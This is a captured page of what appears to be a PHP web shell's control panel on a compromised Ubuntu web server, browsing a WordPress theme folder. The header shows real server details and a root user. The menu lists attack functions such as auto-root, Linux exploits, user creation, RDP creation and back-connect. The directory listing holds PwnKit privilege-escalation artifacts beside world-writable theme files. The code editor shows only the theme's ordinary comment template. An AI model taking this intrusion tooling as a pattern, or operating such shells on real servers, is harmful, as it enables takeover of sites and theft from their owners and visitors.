Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
inselect /
wp-content /
themes /
phlox /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auxin
[ DIR ]
drwxrwxrwx
auxin-content
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
53.08
KB
-rwxrwxrwx
archive.php
1.61
KB
-rwxrwxrwx
comments.php
5.27
KB
-rwxrwxrwx
footer.php
436
B
-rwxrwxrwx
functions.php
816
B
-rwxrwxrwx
header.php
1.09
KB
-rwxrwxrwx
index.php
1.81
KB
-rwxrwxrwx
package-lock.json
685.47
KB
-rwxrwxrwx
page.php
1010
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
rtl.css
59.56
KB
-rwxrwxrwx
screenshot.png
1.46
MB
-rwxrwxrwx
search.php
864
B
-rwxrwxrwx
searchform.php
552
B
-rwxrwxrwx
sidebar-footer.php
3.22
KB
-rwxrwxrwx
sidebar-primary.php
3.42
KB
-rwxrwxrwx
sidebar-secondary.php
1.91
KB
-rwxrwxrwx
sidebar.php
193
B
-rwxrwxrwx
single.php
1.61
KB
-rwxrwxrwx
style.css
1.69
KB
-rwxrwxrwx
taxonomy.php
1016
B
-rwxrwxrwx
wpml-config.xml
2.53
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * Comment template * * * @package Auxin * @author averta (c) 2014-2022 * @link http://averta.net */ ?> <?php // Do not delete these lines // if ( ! empty($_SERVER['SCRIPT_FILENAME'] ) && 'comments.php' == basename( $_SERVER['SCRIPT_FILENAME'] ) ) // die ('Please do not load this page directly. Thanks!'); if ( post_password_required() ) { ?> <p class="nocomments"><?php _e('This post is password protected. Enter the password to view comments.', 'phlox' ); ?></p> <?php return; } ?> <!-- You can start editing here. --> <?php if ( have_comments() ) : ?> <div id="comments" class="aux-comments"> <h3 class="comments-title"> <?php comments_number( __('No Responses', 'phlox' ), __('One Response', 'phlox' ), __('% Responses', 'phlox' ) );?> </h3> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : // are there comments to navigate through ?> <nav class="aux-comments-navi comments-navi-primary"> <div class="comments-pre-page"><?php previous_comments_link() ?></div> <div class="comment-next-page"><?php next_comments_link() ?></div> </nav> <?php endif; ?> <ol class="aux-commentlist skin-arrow-links"> <?php wp_list_comments( array( 'short_ping' => true, 'callback' => 'auxin_comment' ) ); ?> </ol> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : // are there comments to navigate through ?> <nav class="aux-comments-navi comments-navi-secondary"> <div class="comments-pre-page"><?php previous_comments_link() ?></div> <div class="comment-next-page"><?php next_comments_link() ?></div> </nav> <?php endif; ?> </div> <div class="clear"></div> <?php else : // this is displayed if there are no comments so far ?> <?php if ( comments_open() ) : ?> <!-- If comments are open, but there are no comments. --> <?php elseif( get_post_type() == "post" || get_post_type() == "news" ) : // comments are closed ?> <!-- If comments are closed. --> <p class="nocomments"><?php _e("Comments are closed.", 'phlox' ); ?></p> <?php endif; ?> <?php endif; ?> <?php // Whether filling all fields is required or not. $req = get_option( 'require_name_email' ); $author_label = $req ? esc_attr__('Name (required)' , 'phlox' ) : esc_attr__('Name' , 'phlox' ); $email_label = $req ? esc_attr__('E-Mail (required)', 'phlox' ) : esc_attr__('E-Mail', 'phlox' ); $url_label = esc_attr__('Website', 'phlox' ); $textarea_label = esc_attr__('Comment', 'phlox' ); $consent = empty( $commenter['comment_author_email'] ) ? '' : ' checked="checked"'; $comments_args = array( 'must_log_in' => '<p>'. sprintf( __("You must be %s logged in %s to post a comment", 'phlox' ), '<a href="'.wp_login_url( get_permalink() ).'">', '</a>' ) .'</p>', 'logged_in_as' => '<p class="logged-in-as">' . sprintf( __( 'Logged in as <a href="%1$s">%2$s</a>. <a href="%3$s" title="Log out of this account">Log out?</a>', 'phlox' ), self_admin_url( 'profile.php' ), $user_identity, wp_logout_url( apply_filters( 'the_permalink', get_permalink( ) ) ) ) . '</p>', // change the title of send button 'label_submit' => __('Submit' , 'phlox' ) , // change the title of the reply section 'title_reply' =>'<span>' . esc_html__('Leave a Comment', 'phlox' ) . '</span>', // remove "Text or HTML to be displayed after the set of comment fields" 'comment_notes_before' => '<p class="comment-notes"></p>', 'comment_notes_after' => '', // redefine your own textarea (the comment body) 'comment_field' => '<textarea name="comment" id="comment" cols="58" rows="10" placeholder="'. $textarea_label . '" ></textarea>', 'fields' => array( 'author' => '<input type="text" name="author" id="author" placeholder="'. $author_label . '" value="'. esc_attr( $comment_author). '" size="22" '. ( $req ? "aria-required='true' required" : "" ) .' />', 'email' => '<input type="email" name="email" id="email" placeholder="'. $email_label . '" value="'. esc_attr( $comment_author_email). '" ' . ( $req ? "aria-required='true' required" : "" ) .' />', 'url' => '<input type="url" name="url" id="url" placeholder="'. $url_label . '" value="'. esc_url( $comment_author_url). '" size="22" />', 'cookies' => '<div class="aux-form-cookies-consent comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" class="aux-checkbox" type="checkbox" value="yes"' . $consent . ' />' . '<label for="wp-comment-cookies-consent">' . __( 'Save my name, email, and website in this browser for the next time I comment.', 'phlox' ) . '</label></div>' ) ); // Whether to display cookie consent option on comment form if( ! auxin_get_option( 'comment_cookie_consent_enabled', 1 ) ){ $comments_args['fields']['cookies'] = ''; } $comments_args = apply_filters( 'auxin_default_comment_form', $comments_args, compact( 'author_label', 'email_label', 'url_label','textarea_label', 'consent', 'commenter', 'user_identity', 'req' ) ); comment_form( $comments_args );
Close